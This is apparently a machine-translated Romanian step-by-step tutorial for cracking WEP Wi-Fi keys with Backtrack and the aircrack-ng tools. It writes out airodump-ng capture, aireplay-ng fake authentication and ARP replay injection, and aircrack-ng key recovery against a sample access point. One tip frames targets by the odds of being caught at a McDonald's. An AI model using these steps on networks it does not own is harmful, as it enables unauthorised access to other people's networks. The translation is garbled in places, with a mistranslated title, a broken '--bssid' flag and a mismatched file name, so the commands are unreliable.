Păstrați criptarea WEP

Ruperea unei criptări necesită puțină cunoaștere. În primul rând, trebuie să știți că există un model de criptare. În al doilea rând, trebuie să știți cum funcționează criptarea. Acesta este modul în care funcționează cu ajutorul unui program de snooping pentru pachete.

metodă

Imaginea intitulată Break Encryption WEP Pasul 1
1
Utilizați Linux. Windows nu poate deranja pachetele WEP, dar puteți folosi un CD Linux de boot.
  • Imaginea intitulată Break Encryption WEP Pasul 2
    2
    Obțineți un program de sniffing pachet. Backtrack este o opțiune comună. Descărcați imaginea iso și ardeți-o pe un CD / DVD bootabil.
  • Imaginea intitulată Break Encryption WEP Pasul 3
    3
    Boats Linux și Backtrack. Utilizați CD-urile / DVD-urile dvs. bootabile.
    • Rețineți că acest sistem de operare nu trebuie să fie instalat pe un hard disk. Ds înseamnă că de fiecare dată când închideți backtrack, toate datele sunt pierdute.
  • Imaginea intitulată Break Encryption WEP Pasul 4
    4
    Alegeți o opțiune de pornire. Următoarea fereastră de backtrack va fi afișată după pornire. Schimbați opțiunea cu săgețile în sus sau în jos și selectați una. Acest tutorial utilizează prima opțiune.
  • Imaginea intitulată Break Encryption WEP Pasul 5
    5
    Încărcați interfața grafică prin comandă. Această opțiune inițiază Backtrack în baza de comandă. Introduceți comanda: startx pentru a continua.
  • Imaginea intitulată Break Encryption WEP Pasul 6
    6
    Faceți clic pe butonul terminalului din stânga jos. Aceasta este a cincea opțiune.
  • Imagine intitulată Break Encryption WEP Pasul 7
    7
    Așteptați deschiderea terminalului de comandă Linux.
  • Imaginea intitulată Break Encryption WEP Pasul 8
    8
    Uită-te la tipul WLAN. Introduceți următoarea comandă: airmon-ng (fără ghilimele). Ar trebui să aveți ceva de genul wlan0 sub interfață.
  • Imaginea intitulată Break Encryption WEP Pasul 9
    9
    Primiți toate informațiile necesare pentru punctul de acces. Introduceți următoarea comandă: "airodump-ng wlan0" (fără ghilimele). Ar trebui să obțineți trei lucruri:
    • BSSID
    • canal
    • ESSID (numele AP)
    • În cazul tutorialului, aceasta a dus la:
      • BSSID 00: 17: 3F: 76: 36: 6E
      • Numărul canalului 1
      • ESSID (nume AP) Suleman
  • Imaginea intitulată Break Encryption WEP Pasul 10
    10
    Introduceți următoarea comandă. Aceasta utilizează exemplele de date de mai sus, dar trebuie să introduceți propriul dvs. Comandă: "airodump-ng -w wep -c 1 - bssid 00: 17: 3F: 76: 36: 6E wlan0" (fără ghilimele).
  • Imaginea intitulată Break Encryption WEP Pasul 11


    11
    Începeți configurarea.
  • Imaginea intitulată Break Encryption WEP Pasul 12
    12
    deschideți o nouă fereastră terminal. Introduceți următoarea comandă, înlocuind valorile cu propriul BSSID, canal și ESSID. Comandă: "aireplay-ng -1 0 -a 00: 17: 3f: 76: 36: 6E wlan0" (fără ghilimele).
  • Imaginea intitulată Break Encryption WEP Pasul 13
    13
    Deschideți o altă fereastră terminală. Introduceți următoarea comandă: "aireplay-ng -3 -b 00: 17: 3f: 76: 36: 6e wlan0" (fără ghilimele).
  • Imaginea intitulată Break Encryption WEP Pasul 14
    14
    Începeți configurarea.
  • Imaginea intitulată Break Encryption WEP Pasul 15
    15
    Du-te înapoi la prima fereastră terminal.
  • Imaginea intitulată Break Encryption WEP Pasul 16
    16
    Permiteți ca datele din această fereastră să ajungă la 30000 sau mai mult. Acest lucru va dura 15-60 de minute (sau mai mult) în funcție de semnalul wireless, hardware și încărcare la punctul de acces.
  • Imaginea intitulată Break Encryption WEP Pasul 17
    17
    Mergeți la cea de-a treia fereastră a terminalului și apăsați pe Ctrl + c.
  • Imaginea intitulată Break Encryption WEP Pasul 18
    18
    Accesați directoarele. Introduceți următoarea comandă: "dir" (fără ghilimele). Aceasta afișează directoarele stocate în timpul criptării.
  • Imaginea intitulată Break Encryption WEP Pasul 19
    19
    Utilizați un fișier cu capac. În exemplul nostru, aceasta ar fi după cum urmează: "aircrack-ng web-02.cap" (fără ghilimele). Apare configurația de mai jos.
  • Imaginea intitulată Break Encryption WEP Pas 20
    20
    Spargeți cheia WEP. După ce ați terminat această configurare, puteți rupe cheia. În acest exemplu, a fost {ADA2D18D2E}.
  • Sfaturi

    • Multe programe de sniffing precum Wireshark (fostă Ethereal) sau Arisnort și Kismet sunt disponibile ca sursă. Trebuie să aveți un fundal în compilarea codului sursă pentru Linux sau Windows pentru a utiliza Airsnort sau Kismet. Wireshark / Ethereal au un program de instalare sau puteți descărca codul sursă.
    • Probabil că aveți deja versiuni compilate ale majorității programelor de care aveți nevoie.
    • Legile privind securitatea rețelei pot varia de la un loc la altul. Trebuie să știți tot ce este necesar și să fiți pregătit să suportați consecințele dacă încercați.

    avertismente

    • Aceste informații ar trebui utilizate în mod etic. Abuzul acestor informații poate fi ilegal.
    • Aveți nevoie de o placă WiFi specială compatibilă cu programele pe care le utilizați.
    • Fiți atenți întotdeauna cine este scopul tău. Nu e deștept să mergi în Mc Donald și să încerci să-ți spargi rețeaua. Șansa de a fi prinsă crește de zece ori.

    Ce ai nevoie

    • Un PC
    • cunoștințe de calculator
    • Card de lucru wireless
    • Bootable Linux CD / DVD
    • programul Paketsniffing
    Distribuiți pe rețelele sociale:

    înrudit